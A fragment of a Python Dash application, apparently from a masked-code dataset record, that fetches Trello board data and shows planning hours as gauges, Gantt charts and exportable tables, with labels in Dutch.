= deltathismonth + 20\n else:\n gaugerangethismonth = gaugegeplandthismonth + 20\n if deltanextmonth > gaugegeplandnextmonth:\n gaugerangenextmonth = deltanextmonth + 20\n else:\n gaugerangenextmonth = gaugegeplandnextmonth + 20\n if deltatwomonths > gaugegeplandtwomonths:\n gaugerangetwomonths = deltatwomonths + 20\n else:\n gaugerangetwomonths = gaugegeplandtwomonths + 20\n gaugestepsthismonth = {'axis': {'range': [None, gaugerangethismonth]},\n 'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltathismonth *\n 0.5], 'color': '#3deb34'}, {'range': [deltathismonth * 0.5, \n deltathismonth * 0.75], 'color': '#b4eb34'}, {'range': [\n deltathismonth * 0.75, deltathismonth * 0.9], 'color': '#ebb434'},\n {'range': [deltathismonth * 0.9, deltathismonth], 'color':\n '#eb6e34'}, {'range': [deltathismonth, gaugerangethismonth],\n 'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',\n 'width': 4}, 'thickness': 0.75, 'value': deltathismonth}}\n gaugestepsnextmonth = {'axis': {'range': [None, gaugerangenextmonth]},\n 'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltanextmonth *\n 0.5], 'color': '#3deb34'}, {'range': [deltanextmonth * 0.5, \n deltanextmonth * 0.75], 'color': '#b4eb34'}, {'range': [\n deltanextmonth * 0.75, deltanextmonth * 0.9], 'color': '#ebb434'},\n {'range': [deltanextmonth * 0.9, deltanextmonth], 'color':\n '#eb6e34'}, {'range': [deltanextmonth, gaugerangenextmonth],\n 'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',\n 'width': 4}, 'thickness': 0.75, 'value': deltanextmonth}}\n gaugestepstwomonths = {'axis': {'range': [None, gaugerangetwomonths]},\n 'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltatwomonths *\n 0.5], 'color': '#3deb34'}, {'range': [deltatwomonths * 0.5, \n deltatwomonths * 0.75], 'color': '#b4eb34'}, {'range': [\n deltatwomonths * 0.75, deltatwomonths * 0.9], 'color': '#ebb434'},\n {'range': [deltatwomonths * 0.9, deltatwomonths], 'color':\n '#eb6e34'}, {'range': [deltatwomonths, 
gaugerangetwomonths],\n 'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',\n 'width': 4}, 'thickness': 0.75, 'value': deltatwomonths}}\n gaugefig = go.Figure()\n gaugefig.add_trace(go.Indicator(domain={'x': [0, 0.3], 'y': [0, 1]},\n value=gaugegeplandthismonth, mode='gauge+number+delta', title={\n 'text': 'Totale uren voor ' + datetime.strptime(thismonth, '%Y%m').\n strftime('%B')}, delta={'reference': deltathismonth}, gauge=\n gaugestepsthismonth))\n gaugefig.add_trace(go.Indicator(domain={'x': [0.35, 0.65], 'y': [0, 1]},\n value=gaugegeplandnextmonth, mode='gauge+number+delta', title={\n 'text': 'Totale uren voor ' + datetime.strptime(nextmonth, '%Y%m').\n strftime('%B')}, delta={'reference': deltanextmonth}, gauge=\n gaugestepsnextmonth))\n gaugefig.add_trace(go.Indicator(domain={'x': [0.7, 1], 'y': [0, 1]},\n value=gaugegeplandtwomonths, mode='gauge+number+delta', title={\n 'text': 'Totale uren voor ' + datetime.strptime(twomonths, '%Y%m').\n strftime('%B')}, delta={'reference': deltatwomonths}, gauge=\n gaugestepstwomonths))\n gaugefig.update_layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n graphdata = {'nietingepland': bars, 'nietingeplandepics': epicbars,\n 'gaugefig': gaugefig}\n columntypes = {}\n for key, value in kaarten[next(iter(kaarten))].items():\n if 'datum' in key or key == 'Aangemaakt':\n columntypes[key] = 'datetime'\n elif type(value) == int:\n columntypes[key] = 'numeric'\n elif type(value in [str, bool]):\n columntypes[key] = 'text'\n columntypesurenpermaand = dict(columntypes)\n columntypesurenpermaand.update({i: 'text' for i in arrays['perioden']})\n data = {'kaarten': kaarten, 'arrays': arrays, 'urenperdagperkaart':\n urenperdagperkaart, 'beschikbareuren': beschikbareuren, 'graphdata':\n graphdata, 'dfs': {'kaartendf': pd.DataFrame(data=kaarten).T,\n 'columntypes': columntypes, 'urenpermaand': pd.DataFrame(data=\n dfurenpermaand).T, 'columntypesurenpermaand': columntypesurenpermaand}}\n\n\ndef 
make_layout():\n return html.Div(className='First Div', children=[html.Div(style={\n 'font-style': 'italic', 'font-weight': 'bold', 'border': '10px',\n 'box-shadow': '8px 8px 8px grey', 'background': 'rgb(149,193,31)',\n 'background':\n 'linear-gradient(133deg, rgba(62,182,235,1) 0%, rgba(243,253,255,1) 76%, rgba(243,253,255,0) 100%)'\n , 'margin-top': '1%', 'margin-bottom': '1%', 'margin-right': '1%',\n 'margin-left': '1%', 'border-radius': '10px', 'text-align':\n 'center'}, className='Banner', children=[html.Div(style={'display':\n 'inline-block', 'width': '80%'}, children=[html.H1(\n 'Trello borden USD')]), html.Div(style={'display': 'inline-block',\n 'margin-right': '1px'}, children=[html.Img(src=app.get_asset_url(\n 'logonop.png'), style={'width': '150px', 'margin-right': '0px'})])]\n ), html.H5('Kies hieronder een bord', style={'text-align': 'center'\n }), dcc.Dropdown(id='dropdown_boards', options=[{'label': i['name'],\n 'value': i['id']} for i in boards], value=boards[0]['id']), html.\n Button('Data verversen', id='refreshdatabtn', n_clicks=0), html.Div\n (id='test')])\n\n\n<mask token>\n\n\n@app.callback(Output('test', 'children'), [Input('dropdown_boards', 'value'\n ), Input('refreshdatabtn', 'n_clicks')])\ndef create_maindiv(value, n_clicks):\n get_data(value)\n import os\n if os.name == 'nt':\n daterefreshed = datetime.strftime(datetime.now(), '%A %d %b, %H:%M')\n else:\n daterefreshed = datetime.strftime(datetime.now(), '%A %-d %B, %H:%M')\n return html.Div(className='', children=[dcc.Markdown(\n '**Laatst ververst: **' + daterefreshed), dcc.Tabs(className='Tabs',\n children=[dcc.Tab(label='Gantt charts', style=globals['styles'][\n 'tabs'], children=[html.Div(className='tab2_div1', style=globals[\n 'styles']['maindivs'], children=[html.H3('Uitleg'), html.Div(style=\n globals['styles']['divgraphs'], children=[dcc.Markdown(\n 'In dit tabblad worden de kaarten in GANTT charts weergegeven. 
Kies in de dropdown voor welke epic de kaarten moeten worden weergegeven.'\n )])]), html.Div(className='tab2_div2', style=globals['styles'][\n 'maindivs'], children=[html.H4('Gantt per epic'), dcc.Dropdown(\n style=globals['styles']['dropdowns'], id='dropdownganttepics',\n options=[{'label': name, 'value': name} for name in data['arrays'][\n 'epics']], value=[next(iter(data['arrays']['epics']))]), html.Div(\n style=globals['styles']['divgraphs'], children=[dcc.Graph(id=\n 'ganttepics')])]), html.Div(className='tab2_div3', style=globals[\n 'styles']['maindivs'], children=[html.H4('Gantt per persoon'), dcc.\n Dropdown(style=globals['styles']['dropdowns'], id=\n 'dropdownganttpersoon', options=[{'label': name, 'value': name} for\n name in data['arrays'][config.get('Custom Field for Person')]]),\n dcc.Dropdown(style=globals['styles']['dropdowns'], id=\n 'dropdownganttpersoonstatus', options=[{'label': name, 'value':\n name} for name in data['arrays']['statuses']], value=data['arrays']\n ['statuses'], multi=True), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Graph(id='ganttpersoon')])])]), dcc.Tab\n (label='Data export', style=globals['styles']['tabs'], children=[\n html.Div(className='tab3_div1', style=globals['styles']['maindivs'],\n children=[html.H3('Uitleg'), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Markdown(\n \"Hieronder kan de data worden geëxporteerd. Via de buttons 'Export' downloadt je een excelbestand.\"\n ), dcc.Markdown(\n \"In het dashboard kun je met de knop 'Toggle columns' ook velden zichtbaar maken, om van tevoren te filteren. 
Kies dan de velden, filter daarna en klik op 'Export'.\"\n )])]), html.Div(className='tab3_div2', style=globals['styles'][\n 'maindivs'], children=[html.H4('Platte dump'), dcc.Markdown(\n 'Deze tabel laat de platte data zien, zoals in Trello gevuld.'),\n dash_table.DataTable(id='table_plattedump', columns=[{'name': i,\n 'id': i, 'type': data['dfs']['columntypes'].get(i), 'hideable': \n True} for i in data['dfs']['kaartendf'].columns if i in data['dfs']\n ['columntypes'].keys()], data=data['dfs']['kaartendf'].to_dict(\n 'records'), hidden_columns=[i for i in data['dfs']['columntypes']],\n export_format='xlsx', export_headers='display', export_columns=\n 'all', filter_action='native', sort_action='native', sort_mode=\n 'multi', style_table={'overflowX': 'scroll'}, style_header={\n 'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',\n 'fontWeight': 'bold', 'fontFamily': 'Arial'}, style_cell={\n 'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',\n 'text-align': 'left', 'fontFamily': 'Arial', 'height': 'auto'})]),\n html.Div(className='tab3_div3', style=globals['styles']['maindivs'],\n children=[html.H4('Uren per maand'), dcc.Markdown(\n 'Hieronder kan een export gemaakt worden van de uren zoals ze per maand zijn ingepland.'\n ), dcc.Markdown(\n 'Ook hierin kan gefilterd worden. 
filter bijvoorbeeld in de maand naar keuze op >0 om alle kaarten die geen ingeplande uren hebben niet te tonen.'\n ), dash_table.DataTable(id='table_urenpermaand', columns=[{'name':\n i, 'id': i, 'type': data['dfs']['columntypesurenpermaand'].get(i),\n 'hideable': True} for i in data['dfs']['urenpermaand'].columns if i in\n data['dfs']['columntypesurenpermaand'].keys()], data=data['dfs'][\n 'urenpermaand'].to_dict('records'), hidden_columns=[i for i in data\n ['dfs']['columntypesurenpermaand']], export_format='xlsx',\n export_headers='display', export_columns='all', filter_action=\n 'native', sort_action='native', sort_mode='multi', style_header={\n 'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',\n 'fontWeight': 'bold', 'fontFamily': 'Arial'}, style_cell={\n 'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',\n 'text-align': 'left', 'fontFamily': 'Arial'})])]), dcc.Tab(label=\n 'Langetermijnplanning', style=globals['styles']['tabs'], children=[\n html.Div(className='maindivs', style=globals['styles']['maindivs'],\n children=[html.H3('Uitleg'), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Markdown(\n 'In dit tabblad wordt een langetermijnplanning getoond.'), dcc.\n Markdown('De focus hierbij ligt vooral op de categorieen.')])]),\n html.Div(className='maindivs', style=globals['styles']['maindivs'],\n children=[html.H4('Ingeplande uren per categorie'), dcc.Dropdown(\n style=globals['styles']['dropdowns'], id='dropdownurenpermaand',\n options=[{'label': name, 'value': name} for name in data['arrays'][\n config.get('Custom Field for Categories')] if name != None], multi=\n True, searchable=False, value=data['arrays'][config.get(\n 'Custom Field for Categories')]), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Graph(id='urenpermaand')])]), html.Div(\n className='tab1_div3', style=globals['styles']['maindivs'],\n children=[html.H4('Nog in te plannen uren (per lijst)'), dcc.\n Markdown(\n '*Nieuw* zijn 
werkzaamheden die **nog niet** zijn besproken of ze worden gedaan.'\n ), dcc.Markdown(\n '*Wensenlijst* zijn werkzaamheden die **wel** zijn besproken, maar **geen prioriteit** hebben.'\n ), dcc.Markdown(\n '*Inplannen* zijn werkzaamheden die **moeten** gebeuren.'), dcc.\n Markdown(\n '**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'\n ), html.Div(style=globals['styles']['divgraphs'], children=[dcc.\n Graph(id='graph_nietingepland', figure={'data': data['graphdata'][\n 'nietingepland'], 'layout': globals['graphlayouts']['bars']})])]),\n html.Div(className='tab1_div4', style=globals['styles']['maindivs'],\n children=[html.H4('Nog in te plannen uren (per epic)'), dcc.\n Markdown(\n '**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'\n ), html.Div(style=globals['styles']['divgraphs'], children=[dcc.\n Graph(id='graph_nietingepland_epics', figure={'data': data[\n 'graphdata']['nietingeplandepics'], 'layout': globals[\n 'graphlayouts']['bars']})])])]), dcc.Tab(style=globals['styles'][\n 'tabs'], label='Tactische planning', children=[html.Div(className=\n 'maindivs', style=globals['styles']['maindivs'], children=[html.H3(\n 'Uitleg'), dcc.Markdown(\n 'In dit tabblad is een middellange termijnplanning te zien.')]),\n html.Div(className='maindivs', style=globals['styles']['maindivs'],\n children=[html.H4('Totalen'), dcc.Markdown(\n 'Hieronder staan twee totaaloverzichten van de aankomende maanden.'\n ), dcc.Markdown(\n 'De blauwe balk geeft de ingeplande uren weer. 
De streep geeft de beschikbare uren aan.'\n ), dcc.Markdown(\n 'Het kleine getal eronder geeft aan hoeveel uren tekort/over zijn voor die maand.'\n ), html.Div(style=globals['styles']['divgraphs'], children=[dcc.\n Graph(figure=data['graphdata']['gaugefig'])])]), html.Div(className\n ='maindivs', style=globals['styles']['maindivs'], children=[html.H4\n ('Gantt'), dcc.Dropdown(style=globals['styles']['dropdowns'], id=\n 'dropdowngantttactisch', options=[{'label': j, 'value': i} for i, j in\n data['arrays']['threemonths']], multi=False, searchable=False,\n value=data['arrays']['threemonths'][0][0]), html.Div(style=globals[\n 'styles']['divgraphs'], children=[dcc.Graph(id='gantttactisch')])])\n ])])])\n\n\n@app.callback(Output('gantttactisch', 'figure'), [Input(\n 'dropdowngantttactisch', 'value')])\ndef update_gantttactisch(v1):\n if v1 != None:\n if v1[4:] == '12':\n v1plus1 = str(int(v1[0:4]) + 1) + '01'\n else:\n v1plus1 = str(int(v1) + 1)\n if v1[4:] == '01':\n v1min1 = str(int(v1[0:4]) - 1) + '12'\n else:\n v1min1 = str(int(v1) - 1)\n if v1[4:] == '11':\n v1plus2 = str(int(v1[0:4]) + 1) + '01'\n else:\n v1plus2 = str(int(v1) + 2)\n import random\n import numpy as np\n from operator import itemgetter\n ganttdata = []\n monthkey = int(v1)\n for i, j in data['kaarten'].items():\n if j['Status'] in ['Niet gestart', 'Doing', 'Blocked']:\n try:\n if int(datetime.strftime(j['Begindatum'], '%Y%m')\n ) <= monthkey and int(datetime.strftime(j[\n 'Einddatum'], '%Y%m')) >= monthkey:\n if j['Begindatum'].date() < datetime.strptime(\n v1min1 + '01', '%Y%m%d').date():\n start = datetime.strptime(v1min1 + '01', '%Y%m%d'\n ).date()\n else:\n start = j['Begindatum'].date()\n if j['Einddatum'].date() >= datetime.strptime(\n v1plus2 + '01', '%Y%m%d').date():\n eind = datetime.strptime(v1plus2 + '01', '%Y%m%d'\n ).date()\n else:\n eind = j['Einddatum'].date()\n ganttdata.append(dict(Task=j['Epic'], Start=start,\n Finish=eind, Resource=j['Naam'] + ' (uren: ' +\n 
str(round(data['urenperdagperkaart'][j['Naam']]\n ['urenperperiode'][v1])) + ')'))\n except:\n pass\n result = sorted(ganttdata, key=itemgetter('Task'))\n rgb = []\n for c in range(len(result)):\n r = list(np.random.choice(range(256), size=3))\n s2 = ','.join(map(str, r))\n s1 = 'rgb('\n s3 = ')'\n rgb.append(s1 + s2 + s3)\n fig = ff.create_gantt(result, index_col='Resource', show_colorbar=\n True, group_tasks=False, showgrid_x=True, showgrid_y=True,\n colors=rgb)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n fig.add_trace(go.Scatter(mode='lines', x=[v1[0:4] + '-' + v1[4:] +\n '-01', v1[0:4] + '-' + v1[4:] + '-01'], y=[-1, len(result)],\n line={'shape': 'spline', 'color': 'black', 'width': 4},\n showlegend=False))\n fig.add_trace(go.Scatter(mode='lines', x=[v1plus1[0:4] + '-' +\n v1plus1[4:] + '-01', v1plus1[0:4] + '-' + v1plus1[4:] + '-01'],\n y=[-1, len(result)], line={'shape': 'spline', 'color': 'black',\n 'width': 4}, showlegend=False))\n return fig\n else:\n return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=\n 'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n@app.callback(Output('ganttpersoon', 'figure'), [Input(\n 'dropdownganttpersoon', 'value'), Input('dropdownganttpersoonstatus',\n 'value')])\ndef update_ganttpersoon(v1, v2):\n ganttdata = []\n for i, j in data['kaarten'].items():\n if j[config.get('Custom Field for Person')] == v1 and j['Status'\n ] != 'Archived' and j['Status'] in v2:\n try:\n ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(\n 'Custom Field for Starting date')].date(), Finish=j[\n config.get('Custom Field for Ending date')].date(),\n Resource=j['Epic']))\n except:\n pass\n if ganttdata != []:\n fig = ff.create_gantt(ganttdata, index_col='Resource',\n show_colorbar=True, showgrid_x=True, showgrid_y=True)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n return fig\n else:\n return {'data': [go.Pie()], 'layout': 
go.Layout(paper_bgcolor=\n 'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n@app.callback(Output('ganttepics', 'figure'), [Input('dropdownganttepics',\n 'value')])\ndef update_ganttepics(value):\n ganttdata = []\n for i, j in data['kaarten'].items():\n if j['Epic'] == value and j['Status'] != 'Archived':\n try:\n ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(\n 'Custom Field for Starting date')].date(), Finish=j[\n config.get('Custom Field for Ending date')].date(),\n Resource=j['Status']))\n except:\n pass\n if ganttdata != []:\n fig = ff.create_gantt(ganttdata, index_col='Resource',\n show_colorbar=True, showgrid_x=True, showgrid_y=True)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n return fig\n else:\n return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=\n 'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n@app.callback(Output('urenpermaand', 'figure'), [Input(\n 'dropdownurenpermaand', 'value')])\ndef update_urenpermaand(value):\n layout = go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)', xaxis={'title': 'Datum', 'gridcolor': 'gray'},\n yaxis={'title': 'Ingeplande uren', 'gridcolor': 'gray'})\n bars = []\n if 'Regulier werk' in value:\n yaxis = []\n for i in data['arrays']['perioden']:\n yaxis.append(round(sum([value['urenperperiode'][i] for value in\n data['urenperdagperkaart'].values() if value[config.get(\n 'Custom Field for Categories')] == 'Regulier werk']), 0))\n bars.append(dict(x=data['arrays']['xaxis_months'], y=yaxis, name=\n 'Regulier werk', line={'shape': 'spline', 'smoothing': 0.4},\n mode='lines+markers', marker={'symbol': 'triangle-up-open',\n 'size': 10}, stackgroup='one'))\n for categorie in data['arrays'][config.get('Custom Field for Categories')]:\n if categorie in value and categorie != 'Regulier werk':\n if categorie == None:\n categorienaam = 'Geen categorie'\n else:\n categorienaam = categorie\n yaxis = []\n for i in data['arrays']['perioden']:\n 
yaxis.append(round(sum([value['urenperperiode'][i] for\n value in data['urenperdagperkaart'].values() if value[\n config.get('Custom Field for Categories')] == categorie\n ]), 0))\n bars.append(dict(x=data['arrays']['xaxis_months'], y=yaxis,\n name=categorienaam, line={'shape': 'spline', 'smoothing': \n 0.4}, mode='lines+markers', marker={'symbol':\n 'triangle-up-open', 'size': 10}, stackgroup='one'))\n yaxis = []\n for i in data['arrays']['perioden']:\n yaxis.append(round(sum([value['urenperperiode'][i] for value in\n data['beschikbareuren'].values()]), 0))\n bars.append(dict(name='Totaal beschikbare uren', mode='lines', x=data[\n 'arrays']['xaxis_months'], y=yaxis, size=10, line={'shape':\n 'spline', 'smoothing': 0.3, 'width': 6, 'color': 'black'}))\n return {'data': bars, 'layout': layout}\n\n\n@app.server.route('/dash/configuration/')\ndef download_file():\n return flask.send_file('./configuration/configuration.txt',\n attachment_filename='configuration.txt', as_attachment=True,\n cache_timeout=0)\n\n\n<mask token>\n",
"step-3": "<mask token>\ntry:\n with open('./configuration/credentials.txt') as json_file:\n credentials = json.load(json_file)\n with open('./configuration/configuration.txt') as json_file:\n config = json.load(json_file)\nexcept:\n raise Exception('Draai eerst deploy.py!')\nlocale = locale.setlocale(locale.LC_ALL, 'nl_NL.UTF-8')\nglobals = {'config': config, 'credentials': credentials, 'styles': {}}\nboard_url = ('https://api.trello.com/1/members/me/boards?fields=name&key=' +\n credentials.get('API key') + '&token=' + credentials.get('API token'))\nboards = json.loads(json.dumps(requests.get(board_url).json()))\nglobals['boards'] = boards\nglobals['styles']['maindivs'] = {'box-shadow': '8px 8px 8px grey',\n 'background-image': \"url('./assets/left.png')\", 'background-repeat':\n 'no-repeat', 'background-position': '0px 0px', 'margin-top': '1%',\n 'margin-bottom': '1%', 'margin-left': '1%', 'margin-right': '1%',\n 'text-align': 'center', 'border-radius': '10px'}\nglobals['styles']['tabs'] = {'border-style': 'solid', 'border-width': '2px',\n 'background': 'rgb(255,255,255)', 'background':\n 'radial-gradient(circle, rgba(255,255,255,1) 0%, rgba(162,162,162,1) 100%, rgba(255,255,255,1) 100%)'\n , 'margin-top': '5px', 'margin-bottom': '5px', 'margin-right': '5px',\n 'margin-left': '5px', 'border-radius': '6px'}\nglobals['styles']['divgraphs'] = {'background-color':\n 'rgba(62,182,235,0.1)', 'margin-top': '1%', 'margin-bottom': '2%',\n 'margin-left': '1%', 'margin-right': '1%', 'text-align': 'center',\n 'border-radius': '10px'}\nglobals['styles']['dropdowns'] = {'margin-left': '1%', 'margin-right': '2%'}\nglobals['graphlayouts'] = {'bars': go.Layout(barmode='stack', paper_bgcolor\n ='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)', hovermode='closest')}\n\n\ndef get_data(value):\n global data\n global config\n with open('./configuration/configuration.txt') as json_file:\n configfile = json.load(json_file)\n config = configfile.get(value)\n keys = 'key=' + 
credentials.get('API key') + '&token=' + credentials.get(\n 'API token')\n trello_base_url = 'https://api.trello.com/1/'\n board_url = trello_base_url + 'boards/' + value\n url_cards = (board_url +\n '?cards=all&card_pluginData=true&card_attachments=true&card_customFieldItems=true&filter=all&'\n + keys)\n url_lists = board_url + '/lists?filter=all&' + keys\n url_customfields = board_url + '/customFields?' + keys\n url_labels = board_url + '/labels?' + keys\n url_members = board_url + '/members?' + keys\n board = json.loads(json.dumps(requests.get(url_cards).json()))\n lists = json.loads(json.dumps(requests.get(url_lists).json()))\n customfields = json.loads(json.dumps(requests.get(url_customfields).json())\n )\n labels = json.loads(json.dumps(requests.get(url_labels).json()))\n members = json.loads(json.dumps(requests.get(url_members).json()))\n cards = board['cards']\n\n def dateCalc(date):\n try:\n newdate = datetime.strptime(date[0:19], '%Y-%m-%dT%H:%M:%S')\n return newdate\n except:\n return None\n customfields_dict = {'date': {}, 'list': {}, 'text': {}, 'number': {},\n 'checkbox': {}}\n for i in customfields:\n customfields_dict[i['type']] = {}\n for i in customfields:\n customfields_dict[i['type']][i['id']] = {}\n for i in customfields:\n if i['type'] == 'list':\n customfields_dict[i['type']][i['id']]['name'] = i['name']\n customfields_dict['list'][i['id']]['options'] = {}\n for j in i['options']:\n customfields_dict['list'][i['id']]['options'][j['id']] = j[\n 'value'].get('text')\n else:\n customfields_dict[i['type']][i['id']]['name'] = i['name']\n chosenlists = []\n for i in config.get('Not Started'):\n chosenlists.append(i)\n chosenlists.extend(config.get('Blocked'))\n chosenlists.extend(config.get('Doing'))\n chosenlists.extend(config.get('Done'))\n for i in config.get('Epics'):\n chosenlists.append(i)\n for i in config.get('Always continuing'):\n chosenlists.append(i)\n for i in config.get('List with Epics Done'):\n chosenlists.append(i)\n\n def 
idtodate(cardid):\n hex = cardid[0:8]\n timestamp = int(hex, 16)\n timedate = datetime.fromtimestamp(timestamp)\n return timedate\n\n def get_epicid(url):\n try:\n if 'epicId=' in url:\n start = url.find('epicId=') + 7\n end = url.find('&attachmentId=')\n return url[start:end]\n else:\n pass\n except:\n pass\n kaarten = {i['id']: {'Naam': i['name'], 'KaartID': i['id'], 'ListID': i\n ['idList'], 'customfields': i['customFieldItems'], 'Aangemaakt':\n idtodate(i['id']), 'labels': [label['name'] for label in i['labels'\n ] if i['labels'] != []], 'members': [member['fullName'] for member in\n members if member['id'] in i['idMembers']], 'Sjabloon': i[\n 'isTemplate'], 'Vervaldatum': dateCalc(i['due']), 'Gearchiveerd': i\n ['closed'], 'epicid': [get_epicid(j['url']) for j in i[\n 'attachments']], 'Epic': None, 'shortUrl': i['shortUrl']} for i in\n cards}\n for i, j in kaarten.items():\n while None in j['epicid']:\n j['epicid'].remove(None)\n if j['members'] != []:\n j['Leden'] = ''\n for k in j['members']:\n if j['Leden'] == '':\n j['Leden'] += k\n else:\n j['Leden'] += ', ' + k\n else:\n j['Leden'] = None\n del j['members']\n if customfields_dict != {}:\n for i, j in customfields_dict.items():\n for k, l in j.items():\n for m, n in kaarten.items():\n n[l['name']] = None\n for i, j in kaarten.items():\n for k in j['customfields']:\n if k['idCustomField'] in customfields_dict['list'].keys():\n j[customfields_dict['list'][k['idCustomField']].get('name')\n ] = customfields_dict['list'][k['idCustomField']][\n 'options'].get(k['idValue'])\n elif k['idCustomField'] in customfields_dict['checkbox'].keys(\n ):\n if k['value']['checked'] == 'true':\n j[customfields_dict['checkbox'][k['idCustomField']]\n .get('name')] = True\n else:\n j[customfields_dict['checkbox'][k['idCustomField']]\n .get('name')] = False\n elif k['idCustomField'] in customfields_dict['date'].keys():\n j[customfields_dict['date'][k['idCustomField']].get('name')\n ] = dateCalc(k['value'].get('date'))\n else:\n 
for key in k['value']:\n j[customfields_dict[key][k['idCustomField']].get(\n 'name')] = k['value'].get(key)\n epicIdNameCategory = []\n for i, j in kaarten.items():\n epicIdNameCategory.append((i, j['Naam'], j[config.get(\n 'Custom Field for Categories')]))\n for i, j in kaarten.items():\n if j['epicid'] == []:\n j['Epic'] = 'Geen epic'\n j['Categorie'] = None\n else:\n for k in epicIdNameCategory:\n if k[0] == j['epicid'][0]:\n j['Epic'] = k[1]\n j['Categorie'] = k[2]\n del j['epicid']\n for i, j in kaarten.items():\n for k in lists:\n if j['ListID'] == k['id']:\n j['Lijst'] = k['name']\n if j['Lijst'] in config.get('Not Started'):\n j['Status'] = 'Niet gestart'\n elif j['Lijst'] in config.get('Doing'):\n j['Status'] = 'Doing'\n elif j['Lijst'] in config.get('Blocked'):\n j['Status'] = 'Blocked'\n elif j['Lijst'] in config.get('Done'):\n j['Status'] = 'Done'\n elif j['Lijst'] in config.get('Always continuing'):\n j['Status'] = 'Doorlopend'\n elif j['Lijst'] in config.get('Epics'):\n j['Status'] = 'Epics Doing'\n elif j['Lijst'] in config.get('List with Epics Done'):\n j['Status'] = 'Epics Done'\n else:\n j['Status'] = 'Archived'\n del j['customfields']\n del j['ListID']\n for i, j in kaarten.items():\n if j['Gearchiveerd'] == True and j['Status'] != 'Done':\n j['Status'] = 'Archived'\n liststodelete = []\n for i in lists:\n if i['name'] not in chosenlists:\n liststodelete.append(i['name'])\n cardstodelete = []\n for i, j in kaarten.items():\n if j['Sjabloon'] == True:\n cardstodelete.append(i)\n elif j['Lijst'] in liststodelete:\n cardstodelete.append(i)\n hours = {}\n for i, j in kaarten.items():\n if j['Lijst'] == config.get('List for hours'):\n hours[j['Naam']] = {config['Custom Field for Starting date']: j\n [config['Custom Field for Starting date']], config[\n 'Custom Field for Ending date']: j[config[\n 'Custom Field for Ending date']], config[\n 'Custom Field with hours']: j[config[\n 'Custom Field with hours']]}\n for i in cardstodelete:\n if i in 
kaarten:\n del kaarten[i]\n tmpdatesdict = {}\n now = datetime.now().date()\n numdays = 365\n numdayshistory = 183\n for x in range(0, numdays):\n tmpdatesdict[str(now + timedelta(days=x))] = {}\n for x in range(0, numdayshistory):\n tmpdatesdict[str(now - timedelta(days=x))] = {}\n dates = []\n for i in sorted(tmpdatesdict):\n dates.append(i)\n arrays = {'epics': list(dict.fromkeys([card['Epic'] for card in kaarten\n .values()])), 'xaxis_months': list(dict.fromkeys([(i[0:4] + '-' + i\n [5:7] + '-01') for i in dates])), 'perioden': list(dict.fromkeys([(\n i[0:4] + i[5:7]) for i in dates])), 'statuses': list(dict.fromkeys(\n [card['Status'] for card in kaarten.values()])), config.get(\n 'Custom Field for Categories'): list(dict.fromkeys([card[config.get\n ('Custom Field for Categories')] for card in kaarten.values()])),\n config.get('Custom Field for Person'): list(dict.fromkeys([(card[\n config.get('Custom Field for Person')] if card[config.get(\n 'Custom Field for Person')] != None else 'Geen ' + config.get(\n 'Custom Field for Person')) for card in kaarten.values()]))}\n try:\n urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],\n 'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],\n 'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.\n get('Custom Field for Starting date'): kaart[config.get(\n 'Custom Field for Starting date')], config.get(\n 'Custom Field for Ending date'): kaart[config.get(\n 'Custom Field for Ending date')], 'Gebied': kaart['Gebied'],\n config.get('Custom Field for Person'): kaart[config.get(\n 'Custom Field for Person')], config.get(\n 'Custom Field for Categories'): kaart[config.get(\n 'Custom Field for Categories')], config.get(\n 'Custom Field with hours'): kaart[config.get(\n 'Custom Field with hours')], 'Cognosrapport': kaart[\n 'Cognosrapport'], 'Niet meenemen in telling': kaart[\n 'Niet meenemen in telling'], 'Lijst': kaart['Lijst'], 'Status':\n kaart['Status'], 'urenperdag': {i: (0) for i in dates},\n 
